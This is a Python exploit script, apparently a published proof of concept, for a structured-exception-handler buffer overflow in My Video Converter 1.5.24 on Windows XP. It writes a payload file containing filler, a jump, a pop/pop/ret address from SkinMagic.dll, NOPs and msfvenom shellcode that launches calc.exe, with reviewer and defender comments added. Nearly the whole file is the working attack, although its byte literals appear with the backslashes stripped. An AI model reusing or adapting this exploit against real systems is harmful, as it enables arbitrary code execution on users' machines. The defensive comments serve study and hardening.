#!/usr/bin/env python

# Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovery Date : 29/07/2018
# Software Link : http://www.divxtodvd.net/my_video_converter.exe
# Tested Version : 1.5.24
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".
# Just copy the text inside "exploit.txt" and start the My Video Converter 1.5.24 program and click on "Register".
# In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator pop up.
# Greetz : @FuzzySec @LiveOverflow @hexachordanu

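# Builds one long text string and writes it to "exploit.txt". The pieces are
# concatenated in this order: filler, nseh, seh, nops, payload, "C" padding.
# The names nseh/seh and the pop/pop/ret comment below indicate the layout
# targets a structured-exception-handler record on the stack.
#
# NOTE(review): as the literals appear here they contain no backslash escapes,
# so Python treats each one as plain text ("x41" is three characters).

# Filler placed in front of the handler record.
buffer = "x41" * 996
#Short Jump address
nseh = "xebx10x90x90"
#0x1002434b : pop ebp # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:Program FilesMy Video ConverterSkinMagic.dll)
# Defender note: the address above comes from a bundled module that the line
# reports as built without ASLR, rebasing or SafeSEH. A fixed-address module
# with no SafeSEH table is the precondition this layout relies on, so an
# inventory of loaded modules lacking those flags is the relevant hardening check.
seh= "x4Bx43x02x10"
nops = "x90" * 16

#badchar x00x0ax0d
#msfvenom -p windows/exec CMD=calc.exe -b 'x00x0ax0d' -f python
# The generator line above names a payload that only launches calc.exe as proof
# of execution. The observable for detection is the converter process spawning
# a child process it never starts in normal use.
buf = ""
buf += "xbfx4dxb3x6bx1exdaxdaxd9x74x24xf4x58x33"
buf += "xc9xb1x31x31x78x13x83xe8xfcx03x78x42x51"
buf += "x9exe2xb4x17x61x1bx44x78xebxfex75xb8x8f"
buf += "x8bx25x08xdbxdexc9xe3x89xcax5ax81x05xfc"
buf += "xebx2cx70x33xecx1dx40x52x6ex5cx95xb4x4f"
buf += "xafxe8xb5x88xd2x01xe7x41x98xb4x18xe6xd4"
buf += "x04x92xb4xf9x0cx47x0cxfbx3dxd6x07xa2x9d"
buf += "xd8xc4xdex97xc2x09xdax6ex78xf9x90x70xa8"
buf += "x30x58xdex95xfdxabx1exd1x39x54x55x2bx3a"
buf += "xe9x6exe8x41x35xfaxebxe1xbex5cxd0x10x12"
buf += "x3ax93x1exdfx48xfbx02xdex9dx77x3ex6bx20"
buf += "x58xb7x2fx07x7cx9cxf4x26x25x78x5ax56x35"
buf += "x23x03xf2x3dxc9x50x8fx1fx87xa7x1dx1axe5"
buf += "xa8x1dx25x59xc1x2cxaex36x96xb0x65x73x68"
buf += "xfbx24xd5xe1xa2xbcx64x6cx55x6bxaax89xd6"
buf += "x9ex52x6exc6xeax57x2ax40x06x25x23x25x28"
buf += "x9ax44x6cx4bx7dxd7xecxa2x18x5fx96xba"

# Trailing "C" padding; the count is 1000 minus the lengths of the earlier
# pieces (the 8 presumably stands for the two 4-byte handler-record fields;
# confirm). A non-positive count yields an empty string, which is the case for
# the literals as they appear on this page.
exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))

# Context manager so the handle is closed even if the write raises.
with open("exploit.txt", "w") as f:
    f.write(exploit)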